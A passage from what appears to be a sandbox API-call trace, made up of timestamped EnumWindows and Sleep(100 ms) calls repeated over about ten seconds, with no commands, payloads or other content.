(dwMilliseconds=0x64) [0190.083] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.083] Sleep (dwMilliseconds=0x64) [0190.086] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.086] Sleep (dwMilliseconds=0x64) [0190.108] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.108] Sleep (dwMilliseconds=0x64) [0190.142] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.143] Sleep (dwMilliseconds=0x64) [0190.219] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.219] Sleep (dwMilliseconds=0x64) [0190.370] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.370] Sleep (dwMilliseconds=0x64) [0190.470] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.470] Sleep (dwMilliseconds=0x64) [0190.510] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.510] Sleep (dwMilliseconds=0x64) [0190.549] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.549] Sleep (dwMilliseconds=0x64) [0190.591] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.591] Sleep (dwMilliseconds=0x64) [0190.607] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.608] Sleep (dwMilliseconds=0x64) [0190.612] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.612] Sleep (dwMilliseconds=0x64) [0190.619] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.619] Sleep (dwMilliseconds=0x64) [0190.621] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.622] Sleep (dwMilliseconds=0x64) [0190.627] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.627] Sleep (dwMilliseconds=0x64) [0190.633] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.633] Sleep (dwMilliseconds=0x64) [0190.638] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.638] Sleep (dwMilliseconds=0x64) [0190.642] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.642] Sleep (dwMilliseconds=0x64) [0190.679] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.679] Sleep (dwMilliseconds=0x64) [0190.703] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.703] Sleep (dwMilliseconds=0x64) [0190.767] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.768] Sleep (dwMilliseconds=0x64) [0190.890] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0190.891] Sleep (dwMilliseconds=0x64) [0191.013] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0191.014] Sleep (dwMilliseconds=0x64) [0191.627] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0191.627] Sleep (dwMilliseconds=0x64) [0192.053] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.054] Sleep (dwMilliseconds=0x64) [0192.123] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.124] Sleep (dwMilliseconds=0x64) [0192.183] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.196] Sleep (dwMilliseconds=0x64) [0192.203] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.203] Sleep (dwMilliseconds=0x64) [0192.218] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.219] Sleep (dwMilliseconds=0x64) [0192.227] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.227] Sleep (dwMilliseconds=0x64) [0192.249] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.249] Sleep (dwMilliseconds=0x64) [0192.264] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.264] Sleep (dwMilliseconds=0x64) [0192.270] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.271] Sleep (dwMilliseconds=0x64) [0192.311] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.312] Sleep (dwMilliseconds=0x64) [0192.391] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.391] Sleep (dwMilliseconds=0x64) [0192.432] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.432] Sleep (dwMilliseconds=0x64) [0192.481] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.481] Sleep (dwMilliseconds=0x64) [0192.564] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.564] Sleep (dwMilliseconds=0x64) [0192.636] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.636] Sleep (dwMilliseconds=0x64) [0192.682] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.682] Sleep (dwMilliseconds=0x64) [0192.721] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.721] Sleep (dwMilliseconds=0x64) [0192.787] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.788] Sleep (dwMilliseconds=0x64) [0192.800] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.800] Sleep (dwMilliseconds=0x64) [0192.813] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.813] Sleep (dwMilliseconds=0x64) [0192.846] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.847] Sleep (dwMilliseconds=0x64) [0192.858] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.859] Sleep (dwMilliseconds=0x64) [0192.881] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.881] Sleep (dwMilliseconds=0x64) [0192.890] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.890] Sleep (dwMilliseconds=0x64) [0192.946] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.946] Sleep (dwMilliseconds=0x64) [0192.987] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0192.988] Sleep (dwMilliseconds=0x64) [0193.048] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0193.049] Sleep (dwMilliseconds=0x64) [0193.098] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0193.098] Sleep (dwMilliseconds=0x64) [0193.164] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0193.164] Sleep (dwMilliseconds=0x64) [0193.252] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0193.253] Sleep (dwMilliseconds=0x64) [0193.367] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0193.367] Sleep (dwMilliseconds=0x64) [0193.454] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0193.454] Sleep (dwMilliseconds=0x64) [0193.977] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0193.977] Sleep (dwMilliseconds=0x64) [0194.098] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0194.099] Sleep (dwMilliseconds=0x64) [0194.155] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0194.155] Sleep (dwMilliseconds=0x64) [0194.195] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0194.195] Sleep (dwMilliseconds=0x64) [0194.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0194.238] Sleep (dwMilliseconds=0x64) [0194.275] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0194.276] Sleep (dwMilliseconds=0x64) [0194.317] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0194.317] Sleep (dwMilliseconds=0x64) [0194.333] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0194.333] Sleep (dwMilliseconds=0x64) [0194.340] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0194.340] Sleep (dwMilliseconds=0x64) [0194.454] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0194.455] Sleep (dwMilliseconds=0x64) [0195.255] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0195.255] Sleep (dwMilliseconds=0x64) [0195.390] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0195.390] Sleep (dwMilliseconds=0x64) [0195.516] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0195.517] Sleep (dwMilliseconds=0x64) [0195.603] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0195.603] Sleep (dwMilliseconds=0x64) [0195.712] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0195.714] Sleep (dwMilliseconds=0x64) [0195.793] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0195.793] Sleep (dwMilliseconds=0x64) [0195.883] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0195.884] Sleep (dwMilliseconds=0x64) [0195.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0195.953] Sleep (dwMilliseconds=0x64) [0196.125] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.125] Sleep (dwMilliseconds=0x64) [0196.295] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.296] Sleep (dwMilliseconds=0x64) [0196.458] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.459] Sleep (dwMilliseconds=0x64) [0196.524] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.524] Sleep (dwMilliseconds=0x64) [0196.599] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.600] Sleep (dwMilliseconds=0x64) [0196.695] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.695] Sleep (dwMilliseconds=0x64) [0196.762] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.762] Sleep (dwMilliseconds=0x64) [0196.774] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.774] Sleep (dwMilliseconds=0x64) [0196.779] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.779] Sleep (dwMilliseconds=0x64) [0196.783] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.784] Sleep (dwMilliseconds=0x64) [0196.790] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.790] Sleep (dwMilliseconds=0x64) [0196.798] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.798] Sleep (dwMilliseconds=0x64) [0196.813] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.813] Sleep (dwMilliseconds=0x64) [0196.822] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.822] Sleep (dwMilliseconds=0x64) [0196.827] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.827] Sleep (dwMilliseconds=0x64) [0196.831] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.831] Sleep (dwMilliseconds=0x64) [0196.833] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.833] Sleep (dwMilliseconds=0x64) [0196.835] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.836] Sleep (dwMilliseconds=0x64) [0196.840] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.840] Sleep (dwMilliseconds=0x64) [0196.844] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.845] Sleep (dwMilliseconds=0x64) [0196.848] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.848] Sleep (dwMilliseconds=0x64) [0196.855] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.856] Sleep (dwMilliseconds=0x64) [0196.858] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.858] Sleep (dwMilliseconds=0x64) [0196.862] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.862] Sleep (dwMilliseconds=0x64) [0196.868] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.868] Sleep (dwMilliseconds=0x64) [0196.870] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.871] Sleep (dwMilliseconds=0x64) [0196.912] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.912] Sleep (dwMilliseconds=0x64) [0196.956] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.957] Sleep (dwMilliseconds=0x64) [0196.999] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0196.999] Sleep (dwMilliseconds=0x64) [0197.091] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.091] Sleep (dwMilliseconds=0x64) [0197.133] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.133] Sleep (dwMilliseconds=0x64) [0197.171] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.171] Sleep (dwMilliseconds=0x64) [0197.200] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.200] Sleep (dwMilliseconds=0x64) [0197.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.238] Sleep (dwMilliseconds=0x64) [0197.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.277] Sleep (dwMilliseconds=0x64) [0197.347] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.348] Sleep (dwMilliseconds=0x64) [0197.452] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.452] Sleep (dwMilliseconds=0x64) [0197.511] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.511] Sleep (dwMilliseconds=0x64) [0197.552] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.552] Sleep (dwMilliseconds=0x64) [0197.589] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.589] Sleep (dwMilliseconds=0x64) [0197.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.626] Sleep (dwMilliseconds=0x64) [0197.666] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.666] Sleep (dwMilliseconds=0x64) [0197.673] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.673] Sleep (dwMilliseconds=0x64) [0197.678] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.679] Sleep (dwMilliseconds=0x64) [0197.682] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.682] Sleep (dwMilliseconds=0x64) [0197.685] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.686] Sleep (dwMilliseconds=0x64) [0197.690] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.690] Sleep (dwMilliseconds=0x64) [0197.692] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.693] Sleep (dwMilliseconds=0x64) [0197.695] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.695] Sleep (dwMilliseconds=0x64) [0197.703] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.703] Sleep (dwMilliseconds=0x64) [0197.712] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.713] Sleep (dwMilliseconds=0x64) [0197.715] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.716] Sleep (dwMilliseconds=0x64) [0197.718] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.718] Sleep (dwMilliseconds=0x64) [0197.732] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.733] Sleep (dwMilliseconds=0x64) [0197.742] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.742] Sleep (dwMilliseconds=0x64) [0197.778] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.778] Sleep (dwMilliseconds=0x64) [0197.857] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.857] Sleep (dwMilliseconds=0x64) [0197.965] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0197.966] Sleep (dwMilliseconds=0x64) [0198.009] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.009] Sleep (dwMilliseconds=0x64) [0198.088] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.089] Sleep (dwMilliseconds=0x64) [0198.130] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.130] Sleep (dwMilliseconds=0x64) [0198.168] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.168] Sleep (dwMilliseconds=0x64) [0198.209] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.210] Sleep (dwMilliseconds=0x64) [0198.254] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.254] Sleep (dwMilliseconds=0x64) [0198.268] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.268] Sleep (dwMilliseconds=0x64) [0198.273] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.274] Sleep (dwMilliseconds=0x64) [0198.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.277] Sleep (dwMilliseconds=0x64) [0198.281] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.281] Sleep (dwMilliseconds=0x64) [0198.285] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.286] Sleep (dwMilliseconds=0x64) [0198.288] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.288] Sleep (dwMilliseconds=0x64) [0198.291] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.291] Sleep (dwMilliseconds=0x64) [0198.297] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.297] Sleep (dwMilliseconds=0x64) [0198.302] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.302] Sleep (dwMilliseconds=0x64) [0198.312] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.313] Sleep (dwMilliseconds=0x64) [0198.316] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.316] Sleep (dwMilliseconds=0x64) [0198.323] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.324] Sleep (dwMilliseconds=0x64) [0198.327] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.328] Sleep (dwMilliseconds=0x64) [0198.330] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.331] Sleep (dwMilliseconds=0x64) [0198.333] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.333] Sleep (dwMilliseconds=0x64) [0198.336] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.336] Sleep (dwMilliseconds=0x64) [0198.339] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.339] Sleep (dwMilliseconds=0x64) [0198.343] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.344] Sleep (dwMilliseconds=0x64) [0198.350] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.350] Sleep (dwMilliseconds=0x64) [0198.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.372] Sleep (dwMilliseconds=0x64) [0198.435] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.435] Sleep (dwMilliseconds=0x64) [0198.511] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.512] Sleep (dwMilliseconds=0x64) [0198.611] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.611] Sleep (dwMilliseconds=0x64) [0198.780] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.781] Sleep (dwMilliseconds=0x64) [0198.822] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.822] Sleep (dwMilliseconds=0x64) [0198.863] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.863] Sleep (dwMilliseconds=0x64) [0198.906] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.906] Sleep (dwMilliseconds=0x64) [0198.913] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.914] Sleep (dwMilliseconds=0x64) [0198.937] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.940] Sleep (dwMilliseconds=0x64) [0198.946] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.946] Sleep (dwMilliseconds=0x64) [0198.954] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.954] Sleep (dwMilliseconds=0x64) [0198.958] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.958] Sleep (dwMilliseconds=0x64) [0198.961] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.961] Sleep (dwMilliseconds=0x64) [0198.964] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.965] Sleep (dwMilliseconds=0x64) [0198.968] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0198.968] Sleep (dwMilliseconds=0x64) [0199.000] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.001] Sleep (dwMilliseconds=0x64) [0199.027] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.028] Sleep (dwMilliseconds=0x64) [0199.122] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.122] Sleep (dwMilliseconds=0x64) [0199.200] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.200] Sleep (dwMilliseconds=0x64) [0199.297] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.297] Sleep (dwMilliseconds=0x64) [0199.375] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.375] Sleep (dwMilliseconds=0x64) [0199.423] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.424] Sleep (dwMilliseconds=0x64) [0199.467] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.467] Sleep (dwMilliseconds=0x64) [0199.506] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.506] Sleep (dwMilliseconds=0x64) [0199.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.531] Sleep (dwMilliseconds=0x64) [0199.537] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.538] Sleep (dwMilliseconds=0x64) [0199.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.548] Sleep (dwMilliseconds=0x64) [0199.551] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.551] Sleep (dwMilliseconds=0x64) [0199.555] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.555] Sleep (dwMilliseconds=0x64) [0199.558] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.559] Sleep (dwMilliseconds=0x64) [0199.561] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.562] Sleep (dwMilliseconds=0x64) [0199.568] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.568] Sleep (dwMilliseconds=0x64) [0199.574] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.574] Sleep (dwMilliseconds=0x64) [0199.577] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.577] Sleep (dwMilliseconds=0x64) [0199.581] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.581] Sleep (dwMilliseconds=0x64) [0199.588] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.589] Sleep (dwMilliseconds=0x64) [0199.593] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.594] Sleep (dwMilliseconds=0x64) [0199.596] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.596] Sleep (dwMilliseconds=0x64) [0199.599] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.599] Sleep (dwMilliseconds=0x64) [0199.603] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.603] Sleep (dwMilliseconds=0x64) [0199.605] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.606] Sleep (dwMilliseconds=0x64) [0199.608] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.608] Sleep (dwMilliseconds=0x64) [0199.611] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.611] Sleep (dwMilliseconds=0x64) [0199.618] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.618] Sleep (dwMilliseconds=0x64) [0199.639] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.640] Sleep (dwMilliseconds=0x64) [0199.712] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.712] Sleep (dwMilliseconds=0x64) [0199.785] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.785] Sleep (dwMilliseconds=0x64) [0199.950] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0199.951] Sleep (dwMilliseconds=0x64) [0200.023] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.024] Sleep (dwMilliseconds=0x64) [0200.098] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.098] Sleep (dwMilliseconds=0x64) [0200.139] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.140] Sleep (dwMilliseconds=0x64) [0200.174] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.175] Sleep (dwMilliseconds=0x64) [0200.178] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.179] Sleep (dwMilliseconds=0x64) [0200.182] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.182] Sleep (dwMilliseconds=0x64) [0200.187] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.187] Sleep (dwMilliseconds=0x64) [0200.203] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.203] Sleep (dwMilliseconds=0x64) [0200.210] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.210] Sleep (dwMilliseconds=0x64) [0200.214] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.214] Sleep (dwMilliseconds=0x64) [0200.220] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.220] Sleep (dwMilliseconds=0x64) [0200.223] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.224] Sleep (dwMilliseconds=0x64) [0200.227] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.227] Sleep (dwMilliseconds=0x64) [0200.233] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.233] Sleep (dwMilliseconds=0x64) [0200.239] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.239] Sleep (dwMilliseconds=0x64) [0200.242] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.242] Sleep (dwMilliseconds=0x64) [0200.245] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.245] Sleep (dwMilliseconds=0x64) [0200.250] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.250] Sleep (dwMilliseconds=0x64) [0200.253] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.254] Sleep (dwMilliseconds=0x64) [0200.258] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.258] Sleep (dwMilliseconds=0x64) [0200.260] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.261] Sleep (dwMilliseconds=0x64) [0200.284] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.284] Sleep (dwMilliseconds=0x64) [0200.351] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.351] Sleep (dwMilliseconds=0x64) [0200.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.427] Sleep (dwMilliseconds=0x64) [0200.544] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.544] Sleep (dwMilliseconds=0x64) [0200.614] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.614] Sleep (dwMilliseconds=0x64) [0200.654] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.654] Sleep (dwMilliseconds=0x64) [0200.694] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.694] Sleep (dwMilliseconds=0x64) [0200.725] 